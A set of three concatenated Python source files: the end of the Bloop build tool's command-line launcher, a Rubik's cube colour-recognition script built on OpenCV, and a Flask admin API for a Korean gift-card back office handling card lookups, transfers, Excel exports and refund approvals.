# we fallback to ammonite as the default one
# if none is specified
try:
repl_kind_index = cmd_args.index("--repl") + 1
repl_kind = cmd_args[repl_kind_index]
except:
repl_kind = "ammonite"
if cmd == "console" and repl_kind == "ammonite" and exit_code == 0:
with open(out_file_path, 'r') as f:
try:
repl_cmd = f.read().split(" ")
basedir = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
coursier_location = os.path.join(basedir, "blp-coursier")
if (os.path.isfile(coursier_location)):
repl_cmd[0] = coursier_location
if platform.system() == "Windows":
cmd = ["cmd.exe", "/C"] + repl_cmd
# print("Running console in Windows with " + " ".join(cmd))
check_call(cmd)
else:
cmd = ["sh"] + repl_cmd
# print("Running console in Unix system with " + " ".join(cmd))
check_call(cmd)
except CalledProcessError as e:
print("Bloop console failed to run!")
print("-> Command: %s" % e.cmd)
print("-> Return code: %d" % e.returncode)
sys.exit(exit_code)
except NailgunException as e:
sys.stderr.write(str(e))
if "Could not connect to" in str(e):
sys.stderr.write("\n\n")
sys.stderr.write("Have you forgotten to start bloop's server? Run it with `bloop server`.\n")
sys.stderr.write("Check our usage instructions in https://scalacenter.github.io/bloop/\n")
if cmd == "help":
sys.stdout.write("Type `--nailgun-help` for help on the Nailgun CLI tool.\n")
sys.exit(e.code)
except KeyboardInterrupt as e:
pass
if __name__ == "__main__":
main()
|
getdata.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : getdata.py
@Time : 2020/02/14 18:16:06
@Author : Gui XiaoMo
@Version : 1.0
@Contact : 2572225959@qq.com
@License : (C)Copyright 2020-2021, QINGDAO-QUST
@Desc : None
'''
# here put the import lib
import os
import cv2 as cv
import numpy as np
import time
import json
import threading
from queue import Queue
import sys
picture_path='C:/Users/Administrator/Desktop/1/'
picture_number=0 #第几个图片
num=0 #成功了多少张图片
#魔方的颜色
greenLower = (46, 133, 46)
greenUpper = (85, 255, 255)
redLower = (150, 100, 6)
redUpper = (185, 255, 255)
yellowLower = (21, 84, 46)
yellowUpper = (64, 255, 255)
orangeLower = (2, 150, 100)
orangeUpper = (15, 255, 255)
whiteLower = (0, 0, 146) # gray
whiteUpper = (180, 78, 255)
blueLower = (88, 143, 46)
blueUpper = (120, 255, 255)
Side_length=54
Outer_frame=[[10, 10], [85, 10], [160, 10],
[10, 85], [85, 85], [160, 85],
[10, 160], [85, 160], [160, 160]
]
listnet=[]
listall=[]
listhsv=[]
listrgb=[]
class MyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, numpy.integer):
return int(obj)
elif isinstance(obj, numpy.floating):
return float(obj)
elif isinstance(obj, numpy.ndarray):
return obj.tolist()
else:
return super(MyEncoder, self).default(obj)
#获取图片的路径(返回图片路径)
def read_picture(i):
path=picture_path+'huanyuan{0}.jpg'.format(i)
print(path)
return(path)
def indextocolor(index):
color=()
if (index==0):
color=(0, 0, 255)
if (index==1):
color=(255, 0, 0)
if (index==2):
color=(0, 255, 255)
if (index==3):
color=(0, 165, 255)
if (index==4):
color=(0, 255, 0)
if (index==5):
color=(255, 255, 255)
return (color)
def draw_rectangle(image,color,i):
x=Outer_frame[i][0]
y=Outer_frame[i][1]
x1=Outer_frame[i][0]+Side_length
y1=Outer_frame[i][1]+Side_length
cv.rectangle(image,(x,y),(x1,y1),color,-1)
def get_averageBGR(image,x,y):
img = cv.cvtColor(image,cv.COLOR_HSV2RGB)
img=img[x+20:x+45,y+20:y+45]
per_image_Rmean = []
per_image_Gmean = []
per_image_Bmean = []
list1=[]
per_image_Bmean.append(np.mean(img[:,:,0]))
per_image_Gmean.append(np.mean(img[:,:,1]))
per_image_Rmean.append(np.mean(img[:,:,2]))
R_mean = np.mean(per_image_Rmean)
G_mean = np.mean(per_image_Gmean)
B_mean = np.mean(per_image_Bmean)
list1.append(R_mean)
list1.append(G_mean)
list1.append(B_mean)
return (list1)
def get_averageHSV(img,x,y):
hsv=[]
list1=[]
h=s=v=0
image1=img[x+20:x+45,y+20:y+45]
hsv= cv.cvtColor(image1,cv.COLOR_BGR2HSV)
width = hsv.shape[0]
height= hsv.shape[1]
for index1 in range (width):
for index2 in range (height):
h=h+ hsv[index1,index2,0]
s=s+ hsv[index1,index2,1]
v=v+ hsv[index1,index2,2]
aveh=h//(width*height)
aves=s//(width*height)
avev=v//(width*height)
list1.append(aveh)
list1.append(aves)
list1.append(avev)
return (list1)
def average(img):
# 彩色图像均衡化,需要分解通道 对每一个通道均衡化
image_yuv = cv.cvtColor(img,cv.COLOR_BGR2YUV)
#直方图均衡化
image_yuv[:,:,0] = cv.equalizeHist(image_yuv[:,:,0])
#显示效果
output = cv.cvtColor(image_yuv,cv.COLOR_YUV2BGR)
cv.imshow('HistEqualize',output)
return (output)
# img=cv.cvtColor(img,cv.COLOR_BGR2HSV)
# (b, g, r) = cv.split(img)
# bH = cv.equalizeHist(b)
# gH = cv.equalizeHist(g)
# rH = cv.equalizeHist(r)
# # 合并每一个通道
# result = cv.merge((bH, gH, rH))
# cv.imshow("直方图均衡化", result)
def balance(img_input):
# 完美反射白平衡
# STEP 1:计算每个像素的R\G\B之和
# STEP 2:按R+G+B值的大小计算出其前Ratio%的值作为参考点的的阈值T
# STEP 3:对图像中的每个点,计算其中R+G+B值大于T的所有点的R\G\B分量的累积和的平均值
# STEP 4:对每个点将像素量化到[0,255]之间
# 依赖ratio值选取而且对亮度最大区域不是白色的图像效果不佳。
# :param img: cv2.imread读取的图片数据
# :return: 返回的白平衡结果图片数据
img = img_input.copy()
b, g, r = cv.split(img)
m, n, t = img.shape
sum_ = np.zeros(b.shape)
for i in range(m):
for j in range(n):
sum_[i][j] = int(b[i][j]) + int(g[i][j]) + int(r[i][j])
hists, bins = np.histogram(sum_.flatten(), 766, [0, 766])
Y = 765
num, key = 0, 0
ratio = 0.01
while Y >= 0:
num += hists[Y]
if num > m * n * ratio / 100:
key = Y
break
Y = Y - 1
sum_b, sum_g, sum_r = 0, 0, 0
time = 0
for i in range(m):
for j in range(n):
if sum_[i][j] >= key:
sum_b += b[i][j]
sum_g += g[i][j]
sum_r += r[i][j]
time = time + 1
avg_b = sum_b / time
avg_g = sum_g / time
avg_r = sum_r / time
maxvalue = float(np.max(img))
# maxvalue = 255
for i in range(m):
for j in range(n):
b = int(img[i][j][0]) * maxvalue / int(avg_b)
g = int(img[i][j][1]) * maxvalue / int(avg_g)
r = int(img[i][j][2]) * maxvalue / int(avg_r)
if b > 255:
b = 255
if b < 0:
b = 0
if g > 255:
g = 255
if g < 0:
g = 0
if r > 255:
r = 255
if r < 0:
r = 0
img[i][j][0] = b
img[i][j][1] = g
img[i][j][2] = r
return (img)
def gaussi_blur(img):
blur = cv.GaussianBlur(img,(5,5),0)
#cv.imshow("gaussian",blur)
return (blur)
def k_means(img):
Z = img.reshape((-1,3))
Z = np.float32(Z)
# convert to np.float32
# define criteria, number of clusters(K) and apply kmeans()
criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)
K = 8
ret,label,center=cv.kmeans(Z,K,None,criteria,10,cv.KMEANS_RANDOM_CENTERS)
# Now convert back into uint8, and make original image
center = np.uint8(center)
res = center[label.flatten()]
res2 = res.reshape((img.shape))
#cv.imshow("k_means",res2)
return (res2)
'''
image= cv.imread("huanyuan32.jpg")
cv.imshow("image",image)
img1=gaussi_blur(image)
img2=k_means(img1)
cv.imwrite("svmwo1.jpg",img2)
img3=balance(img2)
cv.imshow("balance",img3)
img4=average(img3)
#cv.imwrite("svmwo5.jpg",img4)
'''
def main(src):
img1=gaussi_blur(src)
img2=k_means(img1)
for x,y in (Outer_frame):
listhsv=get_averageHSV(img2,x,y)
listrgb=get_averageBGR(img2,x,y)
listrgb = list(map(int,listrgb))
listnet=listhsv+listrgb
listall.append(listnet)
#print(listall)
#########################多线程尝试#############################################
cube_list_hsv=[[] for _ in range (6)]
cube_list_bgr=[[] for _ in range (6)]
cube_list_all=[[] for _ in range (6)]
cube_list_net=[[] for _ in range (6)]
dict_data={"1":cube_list_all[0],'2':cube_list_all[1],'3':cube_list_all[2],
'4':cube_list_all[3],'5':cube_list_all[4],'6':cube_list_all[5]
}
####多线程分别进行魔方6个面的识别
def job1():
for i in range (1,29):
path1 = read_picture(i)
print (path1,end='\n')
cube_list_hsv[0]=[]
cube_list_bgr[0]=[]
cube_list_net[0]=[]
src1=cv.imread(path1)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[0]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[0]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[0]=list(map(int,cube_list_bgr[0]))
cube_list_net[0]=cube_list_hsv[0]+cube_list_bgr[0]
cube_list_all[0].append(cube_list_net[0])
#q.put(cube_list_all[0])
def job2():
for i in range (29,63):
path2 = read_picture(i)
# print (path1,end='\n')
cube_list_hsv[1]=[]
cube_list_bgr[1]=[]
cube_list_net[1]=[]
src1=cv.imread(path2)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[1]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[1]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[1]=list(map(int,cube_list_bgr[1]))
cube_list_net[1]=cube_list_hsv[1]+cube_list_bgr[1]
cube_list_all[1].append(cube_list_net[1])
#q.put(cube_list_all[0])
def job3():
for i1 in range (63,91):
path1 = read_picture(i1)
print (path1,end='\n')
cube_list_hsv[2]=[]
cube_list_bgr[2]=[]
cube_list_net[2]=[]
src1=cv.imread(path1)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[2]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[2]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[2]=list(map(int,cube_list_bgr[2]))
cube_list_net[2]=cube_list_hsv[2]+cube_list_bgr[2]
cube_list_all[2].append(cube_list_net[2])
#q.put(cube_list_all[0])
def job4():
for i1 in range (91,166):
path1 = read_picture(i1)
print (path1,end='\n')
cube_list_hsv[3]=[]
cube_list_bgr[3]=[]
cube_list_net[3]=[]
src1=cv.imread(path1)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[3]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[3]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[3]=list(map(int,cube_list_bgr[3]))
cube_list_net[3]=cube_list_hsv[3]+cube_list_bgr[3]
cube_list_all[3].append(cube_list_net[3])
#q.put(cube_list_all[0])
def job5():
for i1 in range (205,304):
path1 = read_picture(i1)
print (path1,end='\n')
cube_list_hsv[4]=[]
cube_list_bgr[4]=[]
cube_list_net[4]=[]
src1=cv.imread(path1)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[4]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[4]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[4]=list(map(int,cube_list_bgr[4]))
cube_list_net[4]=cube_list_hsv[4]+cube_list_bgr[4]
cube_list_all[4].append(cube_list_net[4])
#q.put(cube_list_all[0])
def job6():
for i1 in range (304,416):
path1 = read_picture(i1)
print (path1,end='\n')
cube_list_hsv[5]=[]
cube_list_bgr[5]=[]
cube_list_net[5]=[]
src1=cv.imread(path1)
# if not src1:
# print('error reading picture')
# sys.exit()
cube1_img1=gaussi_blur(src1)
cube1_img2=k_means(cube1_img1)
for x,y in (Outer_frame):
cube_list_hsv[5]=get_averageHSV(cube1_img2,x,y)
cube_list_bgr[5]=get_averageBGR(cube1_img2,x,y)
cube_list_bgr[5]=list(map(int,cube_list_bgr[5]))
cube_list_net[5]=cube_list_hsv[5]+cube_list_bgr[5]
cube_list_all[5].append(cube_list_net[5])
#q.put(cube_list_all[0])
'''
q=Queue()
threads=[]
t1 = threading.Thread(target=job1,name=('t1',))
t2 = threading.Thread(target=job2,name=('t2',))
t3 = threading.Thread(target=job3,name=('t3',))
t4 = threading.Thread(target=job4,name=('t4',))
t5 = threading.Thread(target=job5,name=('t5',))
t6 = threading.Thread(target=job6,name=('t6',))
t1.start()
threads.append(t1)
t2.start()
threads.append(t2)
t3.start()
threads.append(t3)
t4.start()
threads.append(t4)
t5.start()
threads.append(t5)
t6.start()
threads.append(t6)
for thread in threads:
thread.join()
print('all pictures are taken\n')
'''
#every_data_contain_number
#for key in dict_data:
number_of_dict=len(dict_data)
#声明6个,用来作为文本存储,json不支持numpy 的int32 我用本办法转换
store_data=[[] for _ in range (number_of_dict)]
#把这几个数组百变成字典中列表的格式
for circule_num,value in zip([x for x in range(0,6)],dict_data.values()):
store_data[circule_num] = [[0,0,0,0,0,0] for i in range (len(value))]
for first in range(len(value)):
for two in range(len(value[first])):
store_data[circule_num][first][two]=int(value[first][two])
for json_number in range (6):
file_name="data{0}.json".format(json_number)
with open(file_name,"w") as f:
json.dump(store_data[json_number],f)
f.close()
'''
for i in range(1,29):
path=read_picture(i)
print (path)
listhsv.clear()#清空hsv的tup
listrgb.clear()#清空rgb的tup
listnet.clear()#清空节点的tup
src = cv.imread(path)
while (src is None):
src = cv.imread(path)
if not src:
print('error reading picture')
sys.exit()
main(src)
print(listall)
print ('个数是')
list_num=len(listall)
store = [[0,0,0,0,0,0] for i in range (list_num)]
for list_1 in range(len(listall)):
for list_2 in range(len(listall[list_1])):
store[list_1][list_2]=int(listall[list_1][list_2])
'''
'''
filename='test.json'
with open(filename,'w') as f:
json.dump(store,f)
f.close()
'''
'''
with open('test(副本).txt','w') as f1:
for temp in listall:
print(type(temp[0]))
data='{},{},{},{},{},{}\n'.format(temp[0],temp[1],temp[2],temp[3],temp[4],temp[5])
f1.write(data)
f1.close()
'''
|
cardApi.py
|
# -*- coding:utf-8 -*-
'''
Created on 2017. 4. 26.
@author: sanghyun
'''
import json
import os
import threading
import time
import zipfile
import hashlib
import httplib
import sys
from datetime import datetime
from urllib import urlencode
from urllib2 import HTTPError
from flask import Blueprint, request
from flask.globals import session, current_app
import xlsxwriter
from routes.api.systemMngApi import postBatchMng, putBatchMng
from util.common import getServerUrl, getParameter, getApiData, getData, API_SERVER_KPC_LEGACY, API_SERVER_BACKOFFICE,\
paramEscape, postData, postApiData, postListApiData, putApiData, \
setStringToNumber, parseDate, EXCEL_FILE_MAKE_LIMT_COUNT, \
EXCEL_FILE_DOWNLOAD_COUNT, setUnicodeEncodeTypeToEucKr, setUnicodeFormatToEucKr, getServerUrl, \
request_get, request_post, API_SERVER_BACKOFFICE
cardApi = Blueprint("cardApi", __name__)
@cardApi.route("/api/card/popCard", methods=['GET'])
def popCardMng():
target = getParameter({}, "target")
cardNumber = paramEscape(getParameter({}, "cardNumber"))
giftNo = paramEscape(getParameter({}, "cardNumber"))
if target == "1" :
giftNo = ""
else :
cardNumber = ""
queryData = {
'cardNumber' : cardNumber,
'giftNo' : giftNo
}
result_data = getData("/admin/v1/card" ,queryData , API_SERVER_KPC_LEGACY)
return json.dumps(result_data)
@cardApi.route("/api/card/popCard/popCardTransfer", methods=["POST"])
def popCardTransfer():
form_data = request.json
postcardData = {
"fromCardNumber" : paramEscape(getParameter(form_data,"fromCardNumber")), #String, 보내는 카드번호
"toCardNumber" : paramEscape(getParameter(form_data,"toCardNumber")), #String, 받는 카드번호
"amount" : paramEscape(getParameter(form_data,"amount")) #String, 금액
}
return json.dumps(postData("/admin/v1/card/transfer", {}, postcardData , API_SERVER_KPC_LEGACY))
@cardApi.route("/api/card/cardDealList", methods=["GET"])
def cardDealList():
form_data = json.loads(request.args.get("formData"))
target = getParameter(form_data, "target")
cardNumber = paramEscape(getParameter(form_data, "cardNumber"))
giftNo = paramEscape(getParameter(form_data, "cardNumber"))
if target == "1" :
giftNo = ""
else :
cardNumber = ""
orderType = getParameter(form_data, "orderType")
searchDate = getParameter(form_data , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'cardNumber' : cardNumber,
'giftNo' : giftNo,
'order' : orderType,
'status' : getParameter(form_data, "status"),
'offset' : setStringToNumber(request.args.get("start")),
'limit' : setStringToNumber(request.args.get("length")),
}
result_data = postListApiData("/admin/v1/card/usages/detail" ,queryData , API_SERVER_KPC_LEGACY)
return json.dumps(result_data)
@cardApi.route('/api/card/excelAll', methods=['GET'])
def cardDealExcelAll():
form_data = json.loads(request.args.get("formData"))
target = getParameter(form_data, "target")
cardNumber = paramEscape(getParameter(form_data, "cardNumber"))
giftNo = paramEscape(getParameter(form_data, "cardNumber"))
if target == "1" :
giftNo = ""
else :
cardNumber = ""
orderType = getParameter(form_data, "orderType")
searchDate = getParameter(form_data , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'cardNumber' : cardNumber,
'giftNo' : giftNo,
'order' : orderType,
'status' : getParameter(form_data, "status"),
'offset' : 0,
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardDealExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
def cardDealExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드정보_'+ datetime.now().strftime('%Y%m%d') +'.zip'
#작업 시작 메시지 추가
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드정보 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드정보_' + datetime.now().strftime('%Y%m%d') + '_' + str(fileCnt) + '.xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"상태")
worksheet.write(row, 1 ,"거래처명")
worksheet.write(row, 2 ,"서비스명")
worksheet.write(row, 3 ,"지불수단")
worksheet.write(row, 4 ,"지불형태")
worksheet.write(row, 5 ,"점포코드")
worksheet.write(row, 6 ,"점포명(사용처)")
worksheet.write(row, 7 ,"POS")
worksheet.write(row, 8 ,"거래번호")
worksheet.write(row, 9 ,"거래일")
worksheet.write(row, 10 ,"거래시간")
worksheet.write(row, 11 ,"거래금액")
worksheet.write(row, 12 ,"결제금액")
worksheet.write(row, 13 ,"할인금액")
worksheet.write(row, 14 ,"잔액")
while True :
result_data = postListApiData("/admin/v1/card/usages/detail" ,queryData , API_SERVER_KPC_LEGACY)
print result_data
for data in result_data["data"]:
row += 1
worksheet.write(row, 0 ,data["status"])
worksheet.write(row, 1 ,data["merchantName"])
worksheet.write(row, 2 ,data["serviceName"])
worksheet.write(row, 3 ,data["payMethod"])
worksheet.write(row, 4 ,data["payType"])
worksheet.write(row, 5 ,data["posCode"])
worksheet.write(row, 6 ,data["posName"])
worksheet.write(row, 7 ,data["pos"])
worksheet.write(row, 8 ,data["orderNo"])
worksheet.write(row, 9 ,parseDate(data["dealDate"] ,'%Y%m%d','%Y-%m-%d'))
worksheet.write(row, 10 ,parseDate(data["dealDate"] + " "+ data["dealTime"] ,'%Y%m%d %H%M%S' ,'%H:%M:%S'))
worksheet.write_number(row, 11 ,long(data["orderAmount"]), money_format)
if(data["dealAmount"]>0) :
worksheet.write_number(row, 12 ,long(data["dealAmount"]), money_format)
else :
worksheet.write(row, 12 ,"-",workbook.add_format({'align':'right'}))
if(data["dcAmount"]>0) :
worksheet.write_number(row, 13 ,long(data["dcAmount"]), money_format)
else :
worksheet.write(row, 13 ,"-",workbook.add_format({'align':'right'}))
worksheet.write(row, 14 ,data["amount"])
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(result_data["data"]) < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
# excelZip.write(os.path.join(folder ,file), os.path.relpath(os.path.join(folder ,file) , uploads), compress_type=zipfile.ZIP_DEFLATED)
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
#에러 메시지 추가
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
#성공 메시지 추가
print "성공"
"""
@cardApi.route("/api/card/refund", methods=["POST"])
def cardRefund():
form_data = request.json
postcardData = {
"cardNumber" : paramEscape(getParameter(form_data,"cardNumber")), #String, 보내는 카드번호
}
return json.dumps(postData("/admin/v1/card/refund", {}, postcardData , API_SERVER_KPC_LEGACY))
"""
#잔액환불 승인요청
@cardApi.route("/api/card/balanceRefund", methods=["POST"])
def cardbalanceRefund():
form_data = request.json
requestData = {
#"refTitle" : "R2 팝카드 잔액환불", #요청 Title
"refTitle" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"workType" : "AWRK-0011", #승인 요청 구분(Code)
"reqType" : "AREQ-0001",
"reqEmpId" : session['empId'], #요청자
"apprEmpId" : getParameter(form_data,"apprEmpId"), #승인자
"reqMemo" : getParameter(form_data,"reqMemo"), #요청 사유
"keyword" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"seq" : getParameter(form_data,"seq"), #승인요청 번호
"contentSeq" : getParameter(form_data,"contentSeq"), #승인 data 등록번호
"refId" : getParameter(form_data,"cardNumber"), #중복승인을 막기 위한 고유 검색 Keyword
"contentData" : json.dumps({
"apiUrl" : getServerUrl(API_SERVER_KPC_LEGACY)+"/KpcLegacyApiService/admin/v1/card/refund", #승인 후 처리될 API Url
"cardNumber" : getParameter(form_data,"cardNumber"),
"giftNo" : getParameter(form_data,"giftNo"),
"balance" : paramEscape(getParameter(form_data,"balance")),
"refundCommision" : paramEscape(getParameter(form_data,"refundCommision")),
"customerName" : getParameter(form_data,"customerName"),
"customerTel" : paramEscape(getParameter(form_data,"customerTel")),
"refundBankCode" : getParameter(form_data,"bankCode"),
"refundBankAccountNo" : getParameter(form_data,"bankAccountNo"),
"refundBankHolder" : getParameter(form_data,"bankHolder")
})
}
reponseResult = postApiData("/approval/request/approval", requestData, API_SERVER_BACKOFFICE)
return json.dumps(reponseResult)
#잔액환불 승인요청 수정
@cardApi.route("/api/card/balanceRefund", methods=["PUT"])
def modifyCardbalanceRefund():
form_data = request.json
requestData = {
#"refTitle" : "R2 팝카드 잔액환불", #요청 Title
"refTitle" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"workType" : "AWRK-0011", #승인 요청 구분(Code)
"reqEmpId" : session['empId'], #요청자
"apprEmpId" : getParameter(form_data,"apprEmpId"), #승인자
"reqMemo" : getParameter(form_data,"reqMemo"), #요청 사유
"keyword" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"seq" : getParameter(form_data,"seq"), #승인요청 번호
"contentSeq" : getParameter(form_data,"contentSeq"), #승인 data 등록번호
"refId" : getParameter(form_data,"cardNumber"), #중복승인을 막기 위한 고유 검색 Keyword
"contentData" : json.dumps({
"apiUrl" : getServerUrl(API_SERVER_KPC_LEGACY)+"/KpcLegacyApiService/admin/v1/card/refund", #승인 후 처리될 API Url
"cardNumber" : getParameter(form_data,"cardNumber"),
"giftNo" : getParameter(form_data,"giftNo"),
"balance" : paramEscape(getParameter(form_data,"balance")),
"refundCommision" : paramEscape(getParameter(form_data,"refundCommision")),
"customerName" : getParameter(form_data,"customerName"),
"customerTel" : paramEscape(getParameter(form_data,"customerTel")),
"refundBankCode" : getParameter(form_data,"bankCode"),
"refundBankAccountNo" : getParameter(form_data,"bankAccountNo"),
"refundBankHolder" : getParameter(form_data,"bankHolder")
})
}
reponseResult = putApiData("/approval/request/approval", requestData, {}, API_SERVER_BACKOFFICE)
return json.dumps(reponseResult)
#잔액 환불 신청 정보가 있는지 확인
@cardApi.route('/api/card/<cardNo>/balance-refund/exist', methods=['GET'])
def existBalanceRefund(cardNo):
return json.dumps(request_get("/approvals/request/"+cardNo+"/exist", None, API_SERVER_BACKOFFICE))
#잔액 환불불가 처리
@cardApi.route('/api/card/balance-refund/rejection', methods=['POST'])
def rejectBalanceRefund():
formData = request.json
rejectData = {
'refundSeqList': formData.get('sequenceList'),
'rejectEmpId': session['empId'],
'refundRejectionMemo': formData.get('rejectRefundMemo'),
}
resultData = request_post("/card/balance-refund/rejection", rejectData, API_SERVER_BACKOFFICE)
return json.dumps(resultData)
#카드 사용제한 설정/해제
@cardApi.route("/api/card/restrict", methods=['POST'])
def cardRestrict():
#사용제한 설정
form_data = request.json
if paramEscape(form_data["restrictYN"])=="Y":
requestData = {
'giftNo' : paramEscape(form_data["giftNo"]),
'cardNumber' : paramEscape(form_data["cardNumber"]),
'insertAdminId' : paramEscape(session["empId"]),
'restrictYN' : paramEscape(form_data["restrictYN"]),
'restrictDesc' : paramEscape(form_data["desc2"])
}
result_data = postData("/admin/v1/card/restrict" ,{}, requestData , API_SERVER_KPC_LEGACY)
#사용제한 해제
elif paramEscape(form_data["restrictYN"])=="N":
requestData = {
#"refTitle" : "R2 팝카드 사용제한 해제", #요청 Title
"refTitle" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"workType" : "AWRK-0012", #승인 요청 구분(Code)
"reqType" : "AREQ-0005", #요청자
"reqEmpId" : session['empId'], #요청구분
"apprEmpId" : getParameter(form_data,"apprEmpId"), #승인자
"reqMemo" : getParameter(form_data,"desc2"), #요청 사유
"keyword" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"contentSeq" : getParameter(form_data,"contentSeq"), #승인 data 등록번호
"refId" : getParameter(form_data,"cardNumber"), #중복승인을 막기 위한 고유 검색 Keyword
"contentData" : json.dumps({
"apiUrl" : getServerUrl(API_SERVER_KPC_LEGACY)+"/KpcLegacyApiService/admin/v1/card/restrict", #승인 후 처리될 API Url
"giftNo" : paramEscape(form_data["giftNo"]),
"cardNumber" : paramEscape(form_data["cardNumber"]),
"insertAdminId" : paramEscape(session["empId"]),
"restrictYN" : paramEscape(form_data["restrictYN"]),
"restrictDesc" : paramEscape(form_data["desc2"])
})
}
result_data = postApiData("/approval/request/approval" , requestData , API_SERVER_BACKOFFICE)
return json.dumps(result_data)
#카드 사용제한 설정/해제 수정
@cardApi.route("/api/card/restrict", methods=['PUT'])
def cardRestrictModify():
#사용제한 설정
form_data = request.json
if paramEscape(form_data["restrictYN"])=="Y":
requestData = {
'giftNo' : paramEscape(form_data["giftNo"]),
'cardNumber' : paramEscape(form_data["cardNumber"]),
'insertAdminId' : paramEscape(session["empId"]),
'restrictYN' : paramEscape(form_data["restrictYN"]),
'restrictDesc' : paramEscape(form_data["desc2"])
}
result_data = postData("/admin/v1/card/restrict" ,{}, requestData , API_SERVER_KPC_LEGACY)
#사용제한 해제
elif paramEscape(form_data["restrictYN"])=="N":
requestData = {
#"refTitle" : "R2 팝카드 사용제한 해제", #요청 Title
"refTitle" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"workType" : "AWRK-0012", #승인 요청 구분(Code)
"reqType" : "AREQ-0005", #요청자
"reqEmpId" : session['empId'], #요청구분
"apprEmpId" : getParameter(form_data,"apprEmpId"), #승인자
"reqMemo" : getParameter(form_data,"desc2"), #요청 사유
"keyword" : getParameter(form_data,"cardNumber"), #승인 목록을 검색하기 위한 Keyword
"seq" : getParameter(form_data,"seq"), #승인요청 번호
"contentSeq" : getParameter(form_data,"contentSeq"), #승인 data 등록번호
"refId" : getParameter(form_data,"cardNumber"), #중복승인을 막기 위한 고유 검색 Keyword
"contentData" : json.dumps({
"apiUrl" : getServerUrl(API_SERVER_KPC_LEGACY)+"/KpcLegacyApiService/admin/v1/card/restrict", #승인 후 처리될 API Url
"giftNo" : paramEscape(form_data["giftNo"]),
"cardNumber" : paramEscape(form_data["cardNumber"]),
"insertAdminId" : paramEscape(session["empId"]),
"restrictYN" : paramEscape(form_data["restrictYN"]),
"restrictDesc" : paramEscape(form_data["desc2"])
})
}
result_data = putApiData("/approval/request/approval" ,requestData ,{} , API_SERVER_BACKOFFICE)
return json.dumps(result_data)
@cardApi.route("/api/card/balanceRefund/detail", methods=['GET'])
def balanceRefundDetail():
seq = json.loads(request.args.get("seq"))
queryData = {
"seq" : seq
}
print(seq)
result_data = getApiData("/card/approveCardBalnaceRefund" ,queryData , API_SERVER_BACKOFFICE)
return json.dumps(result_data)
@cardApi.route("/api/card/balanceRefund/list", methods=['GET'])
def balanceRefundList():
form_data = json.loads(request.args.get("formData"))
searchDate = getParameter(form_data , "searchDate").split(' - ')
